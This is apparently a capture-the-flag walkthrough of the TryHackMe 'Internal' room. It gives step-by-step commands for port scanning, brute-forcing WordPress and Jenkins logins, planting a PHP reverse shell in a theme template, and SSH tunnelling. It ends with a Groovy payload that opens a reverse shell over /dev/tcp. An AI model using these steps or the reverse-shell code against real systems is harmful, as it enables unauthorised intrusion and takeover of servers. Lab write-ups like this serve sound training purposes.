Hello everyone! Today we’ll be covering a Penetration Testing Challenge called “Internal” on TryHackme. Hope You Enjoy It!
Before Starting make sure to add “<room ip> internal.thm” in /etc/hosts
Step 1 : Recon (Information Gathering)
nmap -p- -T4 -A internal.thm
We can determine from the output that SSH and HTTP are running on their default ports, 22 and 80, respectively.
Browsing the page reveals a default Apache welcome page:
After examining page source, I found nothing. So i moved into directory brute forcing using ffuf.
ffuf -w /usr/share/wordlists/dirb/common.txt:FUZZ -u http://internal.thm/FUZZ
After examining the website, I found a login page:
http://internal.thm/blog/wp-login.php
Trying default credentials admin:password did not work, but it indicated the presence of the “admin” user
2. Exploitation:
After intercepting the request with burp suite and running it using intruder. I found the admin password to be my2boys
Another way of doing it is by using wpscan tool:
wpscan --url http://internal.thm/wordpress -U admin -P ~/Desktop/WordLists/Passwords/rockyou.txt
Now we can login to the dashboard using those credentials. From here, we need to find a way to get a reverse shell.
You can go to: Wordpress >> Appearance >> Theme Editor >> 404 template
Replace the existing code with a php reverse shell code. You can find it here:
After making the necessary modifications and saving it, make sure you have an open listener
nc -lvnp <port>Now visit:
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
Et Voilà! You have now a reverse shell. To make it stable:
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
After spending 2 hours here and running linpeas.sh with no luck, I came across a “wp-save.txt” file in /opt.
We got aubreanna ssh credentials. Now time to login in into ssh.
And there it is, we got the user.txt flag
3. Privilege Escalation:
Tried running “sudo -l” but no luck. Aubreanna can not run anything as root
Tried running ““find / -perm -u=s -type 2>/dev/null” nothing interesting came out.
cat jenkins.txt
It appears that there is a Docker instance running on the target machine with a 172-series IP address. Consequently, Jenkins is hosted within Docker, running on port 8080. To access it, we will employ an SSH tunneling technique to forward the Jenkins IP and port from the target machine to our attacker machine’s IP and port.
ssh -L 5555:172.17.0.2:8080 aubreanna@internal.thmNow visit “localhost:5555”
Tried default credentials “admin:password” no luck with that. Tried brute forcing with page with burp intruder using the following wordlist “/usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-10000.txt”.
We got the following creds: “admin:spongebob”.
we reached the dashboard
After a while of searching and googling how to execute some code. I came across a script console while visiting the following url:
Run the following code and make sure you have a running listener
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<ip>/<port>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()we got a shell, now lets make it stable
/bin/bash -iwe got a shell as jenkins. Going into /opt directory, I found a note.txt file containing root ssh credentials
From here, you can login as root and get the root flag.
Hope you enjoyed it!
Happy Hacking!
